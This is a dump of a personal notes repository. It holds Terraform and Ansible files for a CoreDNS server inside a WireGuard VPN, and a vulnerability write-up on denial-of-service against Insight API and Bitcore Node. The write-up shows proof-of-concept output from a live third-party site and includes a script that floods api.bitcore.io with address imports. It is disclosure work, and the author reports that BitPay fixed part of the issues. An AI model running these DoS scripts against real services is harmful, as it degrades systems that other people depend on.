17 | variable "wireguard_server" { 18 | type = map(string) 19 | description = "Map options for WireGuard Server" 20 | 21 | default = { 22 | image = "ubuntu-18.04" 23 | server_type = "cx11-ceph" 24 | datacenter = "nbg1-dc3" 25 | } 26 | } 27 | 28 | variable "test_pool_size" { 29 | type = number 30 | description = "Pool Size of test nodes" 31 | 32 | default = 2 33 | } 34 | 35 | variable "test_pool_server" { 36 | type = map(string) 37 | description = "Map options for Servers from Test Pool" 38 | 39 | default = { 40 | image = "ubuntu-18.04" 41 | server_type = "cx11-ceph" 42 | datacenter = "nbg1-dc3" 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/README.md: -------------------------------------------------------------------------------- 1 | # Own DNS in VPN 2 | 3 | ### DNS 4 | 5 | For what we need DNS in our VPN? Well, if we have 1 service we can easily remember (or note) IP address and use it. More over, because we can assign IP by ourself, it's can be persistent. But what if we have dozen services, few users and services can change their IP's? What if we need add simple load balancing for our services based on DNS? All this can be solved if we will use own DNS service. 6 | 7 | In this note I'll show how do this with [CoreDNS](https://coredns.io/). Why CoreDNS? Because configuration is very simple, project supported by [CNCF](https://www.cncf.io/) and used by default in [Kubernetes](https://kubernetes.io/). 8 | 9 | ### Secure tunnel 10 | 11 | [WireGuard](https://www.wireguard.com/) will be used for secure tunnel to our VPN, you should setup it as I described in guide: [WireGuard setup guide](../2019-07-28-wireguard-setup-guide). 12 | 13 | ### CoreDNS on server 14 | 15 | For automated installtion and configuration CoreDNS on server I created 2 [Ansible](https://www.ansible.com/) roles: 16 | 17 | ```bash 18 | ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook ./coredns-install.yml ./coredns-config.yml -e 'target=dns coredns=1.6.1 coredns_profile=default' 19 | ``` 20 | 21 | What's this roles do? 22 | 23 | - [coredns-install](ansible/roles/coredns-install) 24 | 25 | - install required CoreDNS version (if `latest` set, then role will download latest version) 26 | - disable port `53` binding by `systemd-resolved` in `/etc/systemd/resolved.conf` and restart `systemd-resolved` 27 | - create user `coredns` 28 | - upload [CoreDNS config](ansible/roles/coredns-install/files/Corefile) to `/etc/coredns/Corefile` 29 | - upload [system resolve](ansible/roles/coredns-install/files/resolv.conf) config to `/etc/resolv.conf` 30 | - upload [unit file](ansible/roles/coredns-install/files/coredns.service) for systemd service to `/etc/systemd/system` (see [coredns/deployment:systemd](https://github.com/coredns/deployment/tree/master/systemd)) 31 | - start and active coredns service if CoreDNS was installed 32 | - restart coredns service if CoreDNS was updated 33 | 34 | What uploaded Corefile inclue? 35 | 36 | - [errors](https://coredns.io/plugins/errors/) 37 | - [forward](https://coredns.io/plugins/forward/) (to `213.133.100.100 213.133.98.98 213.133.99.99`, see [Hetzner DNS](https://wiki.hetzner.de/index.php/Hetzner_Standard_Name_Server/en)) 38 | - [cache](https://coredns.io/plugins/cache/) 39 | - [loop](https://coredns.io/plugins/loop/) 40 | - [reload](https://coredns.io/plugins/reload/) with minimal available reload interval 2s 41 | 42 | - [coredns-config](ansible/roles/coredns-config) 43 | 44 | - upload selected CoreDNS profile and his files 45 | 46 | I also added zone `example.com` to default profile for demonstration. 47 | 48 | ### Local setup 49 | 50 | Now our DNS service working and we can check it, with `dig` for example: 51 | 52 | ```bash 53 | $ dig +nocmd @116.203.89.18 -p 53 a.example.com +noall +answer 54 | a.example.com. 5 IN A 10.0.3.1 55 | ``` 56 | 57 | and if `log` plugin is set in your config, you can see logs by typing `journalctl -feu coredns` on `10.0.2.1`: 58 | 59 | ```bash 60 | 2019-08-02T16:47:04.525+02:00 [INFO] 78.81.187.109:35894 - 26238 "A IN a.example.com. udp 54 false 4096" NOERROR qr,aa,rd 60 0.000212109s 61 | ``` 62 | 63 | But we should configure DNS locally somehow for use our DNS in VPN only for domain `example.com`. It's not right if everything (or not required part) will be resolved through our DNS in VPN, because in this case you will disclosure everything what visited to anybody who can have read access to logs of our DNS in VPN. 64 | 65 | If you use [NetworkManager](https://wiki.gnome.org/Projects/NetworkManager) you should disable DNS configuration. For this add next 3 options to `[main]` section to NetworkManager config, located at: `/etc/NetworkManager/NetworkManager.conf`. 66 | 67 | ```ini 68 | [main] 69 | dns=none 70 | rc-manager=unmanaged 71 | systemd-resolved=false 72 | ``` 73 | 74 | and you should restart NetworkManager: `systemctl restart NetworkManager`. 75 | 76 | Next we need to be sure that all DNS requests go through service [systemd-resolved](https://www.freedesktop.org/software/systemd/man/systemd-resolved.service.html). For this we should make `/etc/resolv.conf` as link which will be point to stub file from `systemd-resolved`: 77 | 78 | ```bash 79 | ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf 80 | ``` 81 | 82 | Now we should change `PostUp` command in our `WireGuard` config for `systemd-resolved` configuration: 83 | 84 | ```bash 85 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey) && resolvectl dnssec %i no && resolvectl domain %i ~example.com && resolvectl dns %i 10.0.2.1 86 | ``` 87 | 88 | here we disable DNSSEC, set domain for names resolution and set address of our DNS server. This commands described in man for [resolvectl](https://www.freedesktop.org/software/systemd/man/resolvectl.html). 89 | 90 | Now only `*example.com` will be resolved through `10.0.2.1`, everything rest will be resolved through DNS servers which set in `systemd-resolved` by default or by you. 91 | 92 | \* If you want DNSSEC support, you need add plugin [dnssec](https://coredns.io/plugins/dnssec/) to CoreDNS config and generate keys for zone, but this is not really required since DNS traffic to our server going through secure tunnel. 93 | 94 | ### Default DNS in systemd-resolved 95 | 96 | By default `systemd-resolved` have `FallbackDNS` set to `8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844`. If you want set own DNS by default, you need: 97 | 98 | - Set value for `DNS` in `/etc/systemd/resolved.conf` 99 | - Restart `systemd-resolved`: `systemctl restart systemd-resolved.service` 100 | 101 | Options description on [freedesktop.org](https://www.freedesktop.org): https://www.freedesktop.org/software/systemd/man/resolved.conf.html 102 | 103 | ### Possible future topipcs 104 | 105 | - High Availability with [etcd](https://etcd.io/) 106 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | forks = 10 3 | interpreter_python = /usr/bin/python 4 | 5 | # default user to use for playbooks if user is not specified 6 | # (/usr/bin/ansible will use current user as default) 7 | remote_user = root 8 | 9 | # retry files 10 | # When a playbook fails by default a .retry file will be created in ~/ 11 | # You can disable this feature by setting retry_files_enabled to False 12 | # and you can change the location of the files by setting retry_files_save_path 13 | retry_files_enabled = False 14 | 15 | [inventory] 16 | # enable inventory plugins, default: 'host_list', 'script', 'yaml', 'ini', 'auto' 17 | enable_plugins = yaml, host_list 18 | 19 | [ssh_connection] 20 | 21 | # ssh arguments to use 22 | # Leaving off ControlPersist will result in poor performance, so use 23 | # paramiko on older platforms rather than removing it, -C controls compression use 24 | ssh_args = -C -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey 25 | 26 | # Enabling pipelining reduces the number of SSH operations required to 27 | # execute a module on the remote server. This can result in a significant 28 | # performance improvement when enabled, however when using "sudo:" you must 29 | # first disable 'requiretty' in /etc/sudoers 30 | # 31 | # By default, this option is disabled to preserve compatibility with 32 | # sudoers configurations that have requiretty (the default on many distros). 33 | # 34 | pipelining = True 35 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/coredns-config.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: coredns-config 6 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/coredns-install.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: coredns-install 6 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/inventory/hosts.yml: -------------------------------------------------------------------------------- 1 | --- 2 | all: 3 | children: 4 | dns: 5 | hosts: 6 | 10.0.2.1: 7 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/README.md: -------------------------------------------------------------------------------- 1 | ## coredns-config 2 | 3 | Upload CoreDNS config and required files. 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./coredns-install.yml -e 'target=all coredns_profile=default' 9 | ``` 10 | 11 | `coredns_profile` is `default` by default. 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/defaults/main.yml: -------------------------------------------------------------------------------- 1 | coredns_profile: default 2 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/files/default/Corefile: -------------------------------------------------------------------------------- 1 | . { 2 | errors 3 | file /etc/coredns/db.example.com example.com { 4 | reload 1s 5 | } 6 | forward . 213.133.100.100 213.133.98.98 213.133.99.99 7 | cache 8 | loop 9 | reload 2s # 30s default, 2s min 10 | } 11 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/files/default/db.example.com: -------------------------------------------------------------------------------- 1 | example.com. IN SOA dns.example.com. dns.example.com. 1564497611 2h 30m 1d 30 2 | a.example.com. IN A 10.0.3.1 3 | b.example.com. IN CNAME a.example.com. 4 | c.example.com. IN A 10.0.3.3 5 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-config/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: upload files 4 | copy: 5 | src: "files/{{ coredns_profile }}/" 6 | dest: /etc/coredns/ 7 | owner: root 8 | group: root 9 | mode: 0644 10 | 11 | become: true 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/README.md: -------------------------------------------------------------------------------- 1 | ## coredns-install 2 | 3 | Install [CoreDNS](https://coredns.io/), create simple config and run as systemd service. 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./coredns-install.yml -e 'target=all coredns=1.6.1' 9 | ``` 10 | 11 | It's possible set `coredns` to `latest`, in this case latest avaiable release will be downloaded. 12 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/Corefile: -------------------------------------------------------------------------------- 1 | . { 2 | errors 3 | forward . 213.133.100.100 213.133.98.98 213.133.99.99 4 | cache 5 | loop 6 | reload 2s # 30s default, 2s min 7 | } 8 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/coredns.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=CoreDNS DNS server 3 | Documentation=https://coredns.io 4 | After=network.target 5 | 6 | [Service] 7 | PermissionsStartOnly=true 8 | LimitNOFILE=1048576 9 | LimitNPROC=512 10 | CapabilityBoundingSet=CAP_NET_BIND_SERVICE 11 | AmbientCapabilities=CAP_NET_BIND_SERVICE 12 | NoNewPrivileges=true 13 | User=coredns 14 | WorkingDirectory=~ 15 | ExecStart=/usr/local/bin/coredns -conf=/etc/coredns/Corefile 16 | ExecReload=/bin/kill -SIGUSR1 $MAINPID 17 | Restart=on-failure 18 | 19 | [Install] 20 | WantedBy=multi-user.target 21 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/files/resolv.conf: -------------------------------------------------------------------------------- 1 | # CoreDNS 2 | nameserver 127.0.0.1 3 | -------------------------------------------------------------------------------- /2019-08-02-vpn-own-dns/ansible/roles/coredns-install/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: install curl 4 | apt: 5 | name: 6 | - curl 7 | state: present 8 | cache_valid_time: 86400 9 | 10 | - name: install or update CoreDNS 11 | shell: | 12 | TAG={{ coredns }} 13 | if [ "$TAG" == "latest" ]; then 14 | TAG=$(curl "https://api.github.com/repos/coredns/coredns/releases/latest" | grep -Po '"tag_name": "v\K.*?(?=")') 15 | fi 16 | 17 | CURRENT=$(which coredns > /dev/null && /usr/local/bin/coredns --version | grep -Po '^CoreDNS-\K.*$') 18 | if [ "$CURRENT" != "$TAG" ]; then 19 | curl --location --silent --output - https://github.com/coredns/coredns/releases/download/v$TAG/coredns_$TAG\_linux_amd64.tgz | tar -zxO > /usr/local/bin/coredns-$TAG 20 | chmod +x /usr/local/bin/coredns-$TAG 21 | ln -sf coredns-$TAG /usr/local/bin/coredns 22 | rm -f /usr/local/bin/coredns-$CURRENT 23 | 24 | if [ "$CURRENT" == "" ]; then 25 | mkdir -p /etc/coredns/ 26 | echo installed 27 | else 28 | echo updated 29 | fi 30 | fi 31 | args: 32 | executable: /bin/bash 33 | register: coredns_bin 34 | changed_when: coredns_bin.stdout in ["installed", "updated"] 35 | 36 | - name: disable systemd-resolved port binding 37 | shell: | 38 | perl -pe 's/^DNSStubListener=(?!no)/#DNSStubListener=/g' -i /etc/systemd/resolved.conf 39 | perl -pe 's/^#DNSStubListener=no$/DNSStubListener=no/g' -i /etc/systemd/resolved.conf 40 | if ! grep -q '^DNSStubListener=no$' /etc/systemd/resolved.conf; then 41 | echo 'DNSStubListener=no' >> /etc/systemd/resolved.conf 42 | fi 43 | systemctl restart systemd-resolved.service 44 | when: coredns_bin.stdout == "installed" 45 | 46 | - name: create user `coredns` 47 | user: 48 | name: coredns 49 | home: /var/lib/coredns 50 | comment: CoreDNS is a DNS server that chains plugins 51 | when: coredns_bin.stdout == "installed" 52 | 53 | - name: upload files 54 | copy: 55 | src: "files/{{ item.name }}" 56 | dest: "{{ item.dest }}/{{ item.name }}" 57 | owner: root 58 | group: root 59 | mode: 0644 60 | with_items: 61 | - { name: "Corefile", dest: "/etc/coredns" } 62 | - { name: "resolv.conf", dest: "/etc" } 63 | - { name: "coredns.service", dest: "/etc/systemd/system" } 64 | when: coredns_bin.stdout == "installed" 65 | 66 | - name: activate coredns 67 | systemd: 68 | name: coredns 69 | state: started 70 | enabled: True 71 | daemon_reload: True 72 | when: coredns_bin.stdout == "installed" 73 | 74 | - name: restart coredns 75 | systemd: 76 | name: coredns 77 | state: restarted 78 | when: coredns_bin.stdout == "updated" 79 | 80 | become: true 81 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/README.md: -------------------------------------------------------------------------------- 1 | # Possible DoS of Insight 2 | 3 | ### Insight 4 | 5 | What it is it? [Insight](https://insight.is/) is bitcoin blockchain explorer and API provider. Currently Insight replaced by [Bitcore Node](https://github.com/bitpay/bitcore/blob/master/packages/bitcore-node), but I'll talk about [Insight API v0.4.3](https://github.com/bitpay/insight-api/tree/v0.4.3). This was last release before [BitPay](https://bitpay.com/) started rewrite it, and changes not clear, there was few betas, you can found v5 beta in GitHub tags, later they produced `Bitcore Node` instead Insight. But `v0.4.3` is widely used by bitcoin forks. 6 | 7 | ### Idea 8 | 9 | One time when I go through source code of [insight-api](https://github.com/bitpay/insight-api/tree/v0.4.3) I realized that service can be hanged up if anybody will send very big not valid address in POST request to `/insight-api/addrs/utxo`. Why? Well, I knew that [Base 58](https://en.bitcoin.it/wiki/Base58Check_encoding) encoding is slow for big strings/buffers in JavaScript. I created small tool ([bs58-time-chart](./bs58-time-chart/bs58-time.js)) which show time dependency from length, take a look: 10 | 11 | ![](./bs58-time-chart/bs58-time.png) 12 | 13 | For 100KB payload we need \~10 seconds. It's means that if we will send such payload to service and service will try decode it without length validation, everything rest will be delayed for all decoding time. Why? Because JavaScript is single threaded. 14 | 15 | UTXO method: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/index.js#L204 16 | 17 | `checkAddrs` middleware: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/addresses.js#L92-L100 18 | 19 | Address validation: https://github.com/bitpay/insight-api/blob/v0.4.3/lib/addresses.js#L112-L119 20 | 21 | Base58 decode in Address constructor: https://github.com/bitpay/bitcore-lib/blob/v0.16.0/lib/address.js#L288 22 | 23 | ### PoC 24 | 25 | Demonstration tool placed in [./insight-api-dos](./insight-api-dos): 26 | 27 | ```bash 28 | node insight-dos.js 29 | ``` 30 | 31 | It's not clear, why exactly this not work [https://insight.bitpay.com/](https://insight.bitpay.com/), maybe there not `v0.4.3` anymore? But it's still work on some Insight's, example output for [https://ravencoin.network](https://ravencoin.network): 32 | 33 | ```bash 34 | 2019-08-04T08:32:30.160Z Start DoS call id#1 35 | 2019-08-04T08:32:30.526Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (382.94ms) 36 | 2019-08-04T08:32:36.296Z Best hash: Timeout (3149.32ms) 37 | 2019-08-04T08:32:39.536Z Best hash: Timeout (3140.85ms) 38 | 2019-08-04T08:32:42.778Z Best hash: Timeout (3141.18ms) 39 | 2019-08-04T08:32:46.036Z Best hash: Timeout (3155.93ms) 40 | 2019-08-04T08:32:47.669Z DoS call id#1 error: Bad Request 41 | 2019-08-04T08:32:47.669Z DoS call id#1 done in 17507.44ms 42 | 2019-08-04T08:32:47.971Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (1835.51ms) 43 | 2019-08-04T08:32:48.279Z Best hash: 00000000000029ba2ac2f3a493ec69d8e66ba027dfd6f653a36a369525882cc8 (307.77ms) 44 | ``` 45 | 46 | i.e. 1 call stopped all other requests for \~17s. 47 | 48 | If you want generate own Base58 input: `node gen-post-body.js` 49 | 50 | ## Bitcore Node 51 | 52 | [Current Bitcore Node](https://github.com/bitpay/bitcore/blob/v8.2.0/packages/bitcore-node/docs/api-documentation.md) code not implement POST methods which expect Base58 encoded data, so it's possible to say that this was fixed in some way :) 53 | 54 | But `Bitcore Node` introduced intersting thing like `Publick Key` API. Unfortunately strict validation ignored again. 55 | 56 | First issue related with adding addresses not related with Public Key. In such way we can add arbitrary addresses and then call `balance` method which is aggregation. As demonstration I created small script ([./bitcore-node-pubkey/index.js](./bitcore-node-pubkey/index.js)) which add top 10k addresses by UTXO to specified wallet and later ask about balance. Address import process little wired, so probably after waiting few minutes you will need kill process, comment `walletImportAddresses` function call and run it again. In the end [Cloudflare](https://www.cloudflare.com/) will return HTTP code `520`. While it's not looks like thing which kill service, but this should make database much slower. 57 | 58 | Second issue related with allowing huge strings as arguments (100MB hardoded (!) [source](https://github.com/bitpay/bitcore/blob/v8.2.0/packages/bitcore-node/src/routes/index.ts#L10-L20)). I was able create wallet record with wallet name which have 10MiB size. With default rate limit it's possible sent such request every second, which give ~843GiB (10 * 60 * 60 * 24 / 1024) database size increase in 24 hours. What if data will be sent from 100 addresses, how soon service will down? 59 | 60 | After reporting about this to BitPay they fixed part of it: [bitpay/bitcore/pull/2310](https://github.com/bitpay/bitcore/pull/2310), [bitpay/bitcore/pull/2313](https://github.com/bitpay/bitcore/pull/2313), [bitpay/bitcore/pull/2314](https://github.com/bitpay/bitcore/pull/2314). 61 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/index.js: -------------------------------------------------------------------------------- 1 | const crypto = require('crypto') 2 | const fs = require('fs') 3 | const path = require('path') 4 | const https = require('https') 5 | const { URL } = require('url') 6 | const secp256k1 = require('secp256k1') 7 | 8 | const baseUrl = 'https://api.bitcore.io/api/BTC/mainnet' 9 | const privateKey = Buffer.from('4f79da18f3f552bd0e8c16bc5dbe797293d12bf38fad74a9595d565d80049518', 'hex') 10 | const publicKey = secp256k1.publicKeyCreate(privateKey) 11 | 12 | const utxoAddresses = fs.readFileSync(path.join(__dirname, 'utxo-stats'), 'utf-8').split('\n').map((x) => x.split(' ')[1]).filter((x) => x) 13 | 14 | async function makeRequest (url, opts, data) { 15 | return new Promise((resolve, reject) => { 16 | const req = https.request(url, opts) 17 | req.on('error', reject) 18 | req.on('timeout', () => { 19 | req.abort() 20 | reject(new Error('Timeout error')) 21 | }) 22 | req.on('response', (resp) => { 23 | console.log(`${resp.statusCode}: ${resp.statusMessage}`) 24 | if (resp.statusCode !== 200) { 25 | // return reject(new Error(`${resp.statusCode}: ${resp.statusMessage}`)) 26 | } 27 | 28 | const chunks = [] 29 | resp.on('data', (chunk) => chunks.push(chunk)) 30 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 31 | }) 32 | 33 | req.end(data) 34 | }) 35 | } 36 | 37 | function sha256x2 (buffer) { 38 | buffer = crypto.createHash('sha256').update(buffer).digest() 39 | return crypto.createHash('sha256').update(buffer).digest() 40 | } 41 | 42 | function getSignature (url, method, body = JSON.stringify({})) { 43 | const parsedUrl = new URL(url) 44 | const msg = [method, parsedUrl.pathname + parsedUrl.search, body].join('|') 45 | const msgHash = sha256x2(Buffer.from(msg)) 46 | return secp256k1.sign(msgHash, privateKey).signature.toString('hex') 47 | } 48 | 49 | async function walletCallGetMethod (method) { 50 | const url = `${baseUrl}/wallet/${publicKey.toString('hex')}${method}` 51 | const headers = { 'Content-Type': 'application/json', 'x-signature': getSignature(url, 'GET') } 52 | return makeRequest(url, { headers }) 53 | } 54 | 55 | async function walletCreate () { 56 | const headers = { 'Content-Type': 'application/json' } 57 | const body = JSON.stringify({ 58 | name: 'PubKey Tests', 59 | pubKey: publicKey.toString('hex'), 60 | path: "m/44'/0'/0'" 61 | }) 62 | const data = await makeRequest(`${baseUrl}/wallet/`, { method: 'POST', headers }, body) 63 | return data === 'Wallet already exists' ? data : `Wallet created, id: ${JSON.parse(data)._id}` 64 | } 65 | 66 | async function walletImportAddresses (addresses) { 67 | const url = `${baseUrl}/wallet/${publicKey.toString('hex')}` 68 | const body = JSON.stringify(addresses.map((address) => ({ address }))) 69 | const headers = { 'Content-Type': 'application/octet-stream', 'x-signature': getSignature(url, 'POST', body) } 70 | return await makeRequest(url, { method: 'POST', headers }, body) 71 | } 72 | 73 | ;(async () => { 74 | // console.log(await walletCreate()) 75 | // console.log(await walletCallGetMethod('')) 76 | console.log(await walletCallGetMethod('/check')) 77 | console.log(await walletImportAddresses(utxoAddresses)) 78 | console.log(await walletCallGetMethod('/balance')) 79 | // console.log(await walletCallGetMethod('/addresses')) // not deployed end? 80 | })().catch((err) => { 81 | console.error(err.stack || err) 82 | process.exit(1) 83 | }) 84 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "secp256k1": "^3.7.1" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bitcore-node-pubkey/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | bindings@^1.5.0: 6 | version "1.5.0" 7 | resolved "https://registry.yarnpkg.com/bindings/-/bindings-1.5.0.tgz#10353c9e945334bc0511a6d90b38fbc7c9c504df" 8 | integrity sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ== 9 | dependencies: 10 | file-uri-to-path "1.0.0" 11 | 12 | bip66@^1.1.5: 13 | version "1.1.5" 14 | resolved "https://registry.yarnpkg.com/bip66/-/bip66-1.1.5.tgz#01fa8748785ca70955d5011217d1b3139969ca22" 15 | integrity sha1-AfqHSHhcpwlV1QESF9GzE5lpyiI= 16 | dependencies: 17 | safe-buffer "^5.0.1" 18 | 19 | bn.js@^4.11.8, bn.js@^4.4.0: 20 | version "4.11.8" 21 | resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" 22 | integrity sha512-ItfYfPLkWHUjckQCk8xC+LwxgK8NYcXywGigJgSwOP8Y2iyWT4f2vsZnoOXTTbo+o5yXmIUJ4gn5538SO5S3gA== 23 | 24 | brorand@^1.0.1: 25 | version "1.1.0" 26 | resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" 27 | integrity sha1-EsJe/kCkXjwyPrhnWgoM5XsiNx8= 28 | 29 | browserify-aes@^1.0.6: 30 | version "1.2.0" 31 | resolved "https://registry.yarnpkg.com/browserify-aes/-/browserify-aes-1.2.0.tgz#326734642f403dabc3003209853bb70ad428ef48" 32 | integrity sha512-+7CHXqGuspUn/Sl5aO7Ea0xWGAtETPXNSAjHo48JfLdPWcMng33Xe4znFvQweqc/uzk5zSOI3H52CYnjCfb5hA== 33 | dependencies: 34 | buffer-xor "^1.0.3" 35 | cipher-base "^1.0.0" 36 | create-hash "^1.1.0" 37 | evp_bytestokey "^1.0.3" 38 | inherits "^2.0.1" 39 | safe-buffer "^5.0.1" 40 | 41 | buffer-xor@^1.0.3: 42 | version "1.0.3" 43 | resolved "https://registry.yarnpkg.com/buffer-xor/-/buffer-xor-1.0.3.tgz#26e61ed1422fb70dd42e6e36729ed51d855fe8d9" 44 | integrity sha1-JuYe0UIvtw3ULm42cp7VHYVf6Nk= 45 | 46 | cipher-base@^1.0.0, cipher-base@^1.0.1, cipher-base@^1.0.3: 47 | version "1.0.4" 48 | resolved "https://registry.yarnpkg.com/cipher-base/-/cipher-base-1.0.4.tgz#8760e4ecc272f4c363532f926d874aae2c1397de" 49 | integrity sha512-Kkht5ye6ZGmwv40uUDZztayT2ThLQGfnj/T71N/XzeZeo3nf8foyW7zGTsPYkEya3m5f3cAypH+qe7YOrM1U2Q== 50 | dependencies: 51 | inherits "^2.0.1" 52 | safe-buffer "^5.0.1" 53 | 54 | create-hash@^1.1.0, create-hash@^1.1.2, create-hash@^1.2.0: 55 | version "1.2.0" 56 | resolved "https://registry.yarnpkg.com/create-hash/-/create-hash-1.2.0.tgz#889078af11a63756bcfb59bd221996be3a9ef196" 57 | integrity sha512-z00bCGNHDG8mHAkP7CtT1qVu+bFQUPjYq/4Iv3C3kWjTFV10zIjfSoeqXo9Asws8gwSHDGj/hl2u4OGIjapeCg== 58 | dependencies: 59 | cipher-base "^1.0.1" 60 | inherits "^2.0.1" 61 | md5.js "^1.3.4" 62 | ripemd160 "^2.0.1" 63 | sha.js "^2.4.0" 64 | 65 | create-hmac@^1.1.4: 66 | version "1.1.7" 67 | resolved "https://registry.yarnpkg.com/create-hmac/-/create-hmac-1.1.7.tgz#69170c78b3ab957147b2b8b04572e47ead2243ff" 68 | integrity sha512-MJG9liiZ+ogc4TzUwuvbER1JRdgvUFSB5+VR/g5h82fGaIRWMWddtKBHi7/sVhfjQZ6SehlyhvQYrcYkaUIpLg== 69 | dependencies: 70 | cipher-base "^1.0.3" 71 | create-hash "^1.1.0" 72 | inherits "^2.0.1" 73 | ripemd160 "^2.0.0" 74 | safe-buffer "^5.0.1" 75 | sha.js "^2.4.8" 76 | 77 | drbg.js@^1.0.1: 78 | version "1.0.1" 79 | resolved "https://registry.yarnpkg.com/drbg.js/-/drbg.js-1.0.1.tgz#3e36b6c42b37043823cdbc332d58f31e2445480b" 80 | integrity sha1-Pja2xCs3BDgjzbwzLVjzHiRFSAs= 81 | dependencies: 82 | browserify-aes "^1.0.6" 83 | create-hash "^1.1.2" 84 | create-hmac "^1.1.4" 85 | 86 | elliptic@^6.4.1: 87 | version "6.5.0" 88 | resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.5.0.tgz#2b8ed4c891b7de3200e14412a5b8248c7af505ca" 89 | integrity sha512-eFOJTMyCYb7xtE/caJ6JJu+bhi67WCYNbkGSknu20pmM8Ke/bqOfdnZWxyoGN26JgfxTbXrsCkEw4KheCT/KGg== 90 | dependencies: 91 | bn.js "^4.4.0" 92 | brorand "^1.0.1" 93 | hash.js "^1.0.0" 94 | hmac-drbg "^1.0.0" 95 | inherits "^2.0.1" 96 | minimalistic-assert "^1.0.0" 97 | minimalistic-crypto-utils "^1.0.0" 98 | 99 | evp_bytestokey@^1.0.3: 100 | version "1.0.3" 101 | resolved "https://registry.yarnpkg.com/evp_bytestokey/-/evp_bytestokey-1.0.3.tgz#7fcbdb198dc71959432efe13842684e0525acb02" 102 | integrity sha512-/f2Go4TognH/KvCISP7OUsHn85hT9nUkxxA9BEWxFn+Oj9o8ZNLm/40hdlgSLyuOimsrTKLUMEorQexp/aPQeA== 103 | dependencies: 104 | md5.js "^1.3.4" 105 | safe-buffer "^5.1.1" 106 | 107 | file-uri-to-path@1.0.0: 108 | version "1.0.0" 109 | resolved "https://registry.yarnpkg.com/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz#553a7b8446ff6f684359c445f1e37a05dacc33dd" 110 | integrity sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw== 111 | 112 | hash-base@^3.0.0: 113 | version "3.0.4" 114 | resolved "https://registry.yarnpkg.com/hash-base/-/hash-base-3.0.4.tgz#5fc8686847ecd73499403319a6b0a3f3f6ae4918" 115 | integrity sha1-X8hoaEfs1zSZQDMZprCj8/auSRg= 116 | dependencies: 117 | inherits "^2.0.1" 118 | safe-buffer "^5.0.1" 119 | 120 | hash.js@^1.0.0, hash.js@^1.0.3: 121 | version "1.1.7" 122 | resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.7.tgz#0babca538e8d4ee4a0f8988d68866537a003cf42" 123 | integrity sha512-taOaskGt4z4SOANNseOviYDvjEJinIkRgmp7LbKP2YTTmVxWBl87s/uzK9r+44BclBSp2X7K1hqeNfz9JbBeXA== 124 | dependencies: 125 | inherits "^2.0.3" 126 | minimalistic-assert "^1.0.1" 127 | 128 | hmac-drbg@^1.0.0: 129 | version "1.0.1" 130 | resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1" 131 | integrity sha1-0nRXAQJabHdabFRXk+1QL8DGSaE= 132 | dependencies: 133 | 